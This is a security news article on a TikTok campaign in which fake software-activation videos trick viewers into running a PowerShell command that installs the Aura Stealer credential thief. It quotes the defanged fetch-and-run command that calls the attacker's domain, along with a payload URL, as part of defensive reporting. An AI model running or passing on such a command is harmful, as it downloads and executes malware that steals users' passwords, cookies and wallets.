Cybercriminals are distributing information-stealing malware through a campaign on TikTok, using videos that falsely claim to be free activation guides for popular software. The ongoing operation, identified on October 19, 2025, uses a social engineering method to trick users into infecting their own computers.

ISC Handler Xavier Mertens reported the campaign, noting its similarities to an operation observed by Trend Micro in May. The TikTok videos purport to offer instructions for activating legitimate software such as Windows, Microsoft 365, Adobe Premiere, Photoshop, CapCut Pro, and Discord Nitro. The campaign also promotes fabricated services, including “Netflix Premium” and “Spotify Premium,” to lure a wider audience.

The attack technique is known as a ClickFix attack, which involves providing seemingly helpful instructions that deceive users into running malicious commands. The videos display a short, one-line PowerShell command and instruct viewers to execute it with administrator privileges. An example command shown is iex (irm slmgr[.]win/photoshop). The specific program name within the URL, such as “photoshop,” is altered to match the software being impersonated in the video.

You Might Also Like
A job listing of Microsoft reveals Surface Duo 2 5G
A job listing of Microsoft reveals Surface Duo 2 5G
Nvidia announces processor to compete against Intel and AMD
Nvidia announces a new processor called Grace to compete with Intel and AMD
Realme presented Buds Air Neo 2 headphones: Specs, price and release date
Realme presented Buds Air Neo 2 headphones: Specs, price and release date

When a user executes this command, PowerShell connects to the remote site slmgr[.]win. This action retrieves and runs a second PowerShell script, which then downloads two executable files from Cloudflare pages. The first file, downloaded from https://file-epq[.]pages[.]dev/updater.exe, is a variant of the Aura Stealer malware. Aura Stealer is designed to harvest saved credentials from web browsers, authentication cookies, cryptocurrency wallets, and login data from other applications. This stolen information is then uploaded to the attackers, granting them access to the victim’s accounts.

A second payload, named source.exe, is also downloaded. This executable is used to self-compile code using the .NET framework’s built-in Visual C# Compiler (csc.exe). The compiled code is subsequently injected and launched directly in memory. The specific purpose of this second payload has not yet been determined.

Users who have followed the instructions in these videos should consider all of their credentials compromised and are advised to immediately reset passwords for all websites and online services they use.

ClickFix attacks have become significantly more common over the past year. They are used to distribute various malware strains in campaigns related to ransomware and cryptocurrency theft. As a general security practice, users should never copy text from a website and execute it in an operating system dialog box, including the File Explorer address bar, command prompt, PowerShell, macOS terminal, or Linux shells.